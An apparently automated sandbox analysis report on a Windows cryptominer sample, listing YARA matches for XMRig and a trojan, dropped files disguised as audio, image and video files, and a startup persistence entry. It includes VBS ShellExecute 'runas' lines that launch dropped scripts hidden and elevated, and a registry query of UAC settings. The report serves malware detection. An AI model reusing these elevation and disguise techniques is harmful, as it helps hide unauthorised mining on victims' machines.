Source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000000.00000003.2159430929.0000000002EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: Process Memory Space: K4gsPJGEi4.exe PID: 3652, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source: C:\Windows\SysWOW64\cmd.exe	Dropped file: Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\est1.cmd", , , "runas", 0	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped file: Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\two.cmd", , , "runas", 0	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped file: Shell.ShellExecute "C:\Users\user\AppData\Local\Temp\stwinvr.cmd", , , "runas", 0	Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_00405118 PostQuitMessage,PostQuitMessage,PostQuitMessage,NtdllDefWindowProc_A,

18_2_00405118

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_0040AC8D: CloseHandle,atoi,atoi,atoi,DeviceIoControl,

18_2_0040AC8D

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\Public\WinRing0x64.sys

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\V_Test1.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\In.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\aatem.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\aapub.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\sc.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\cm.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Sy.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\RuntimeBroker.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Au.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Ri.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\co2.avi	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\co1.avi	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: String function: 00410900 appears 61 times

Source: K4gsPJGEi4.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: K4gsPJGEi4.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Source: K4gsPJGEi4.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: K4gsPJGEi4.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386, for MS Windows
Source: K4gsPJGEi4.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (console) Intel 80386, for MS Windows
Source: K4gsPJGEi4.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (native) x86-64, for MS Windows
Source: K4gsPJGEi4.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows

Source: Sy.avi.15.dr	Static PE information: Number of sections : 16 > 10
Source: Systemfo.jpg.15.dr	Static PE information: Number of sections : 16 > 10
Source: RtkAudio.exe.15.dr	Static PE information: Number of sections : 11 > 10
Source: RtkAudio.txt.0.dr	Static PE information: Number of sections : 11 > 10
Source: Systemfont.exe.15.dr	Static PE information: Number of sections : 16 > 10
Source: RtkAudio.exe0.15.dr	Static PE information: Number of sections : 11 > 10
Source: Au.avi.15.dr	Static PE information: Number of sections : 11 > 10
Source: Systemfont.txt.0.dr	Static PE information: Number of sections : 16 > 10
Source: Aud.jpg.15.dr	Static PE information: Number of sections : 11 > 10
Source: RtkAudio.exe1.15.dr	Static PE information: Number of sections : 11 > 10

Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.000000000073A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIntelSvc.exe4 vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe, 00000000.00000003.2151315509.000000000319B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIntelSvc.exe4 vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.0000000001099000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAudio.exe, vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWinRing0.sys2 vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.0000000003679000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAudio.exe, vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.000000000041A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNirCmd.exe. vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe, 00000000.00000003.2150317794.0000000002D34000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNirCmd.exe. vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe	Binary or memory string: OriginalFilenameNirCmd.exe. vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe	Binary or memory string: OriginalFilenameIntelSvc.exe4 vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe	Binary or memory string: OriginalFilenameWinRing0.sys2 vs K4gsPJGEi4.exe
Source: K4gsPJGEi4.exe	Binary or memory string: OriginalFilenameAudio.exe, vs K4gsPJGEi4.exe

Source: K4gsPJGEi4.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin"

Source: Yara match	File source: 18.2.screen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.screen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: screen.exe PID: 6668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: screen.exe PID: 4128, type: MEMORYSTR

Source: K4gsPJGEi4.exe, type: SAMPLE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: K4gsPJGEi4.exe, type: SAMPLE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: K4gsPJGEi4.exe, type: SAMPLE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: K4gsPJGEi4.exe, type: SAMPLE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 0.0.K4gsPJGEi4.exe.8bc490.2.raw.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 0.0.K4gsPJGEi4.exe.7b66bc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000000.00000003.2159430929.0000000002EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: 00000000.00000000.2137379711.0000000000789000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: Process Memory Space: K4gsPJGEi4.exe PID: 3652, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\Public\RtkAudio.exe, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: WinRing0x64.txt.0.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.evad.mine.winEXE@259/88@2/0

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_0040E395 CreateToolhelp32Snapshot,memset,Process32First,OpenProcess,memset,GetModuleHandleA,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32Next,CloseHandle,

18_2_0040E395

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d.txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe

File created: C:\Users\user\AppData\Local\Temp\screen.exe

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

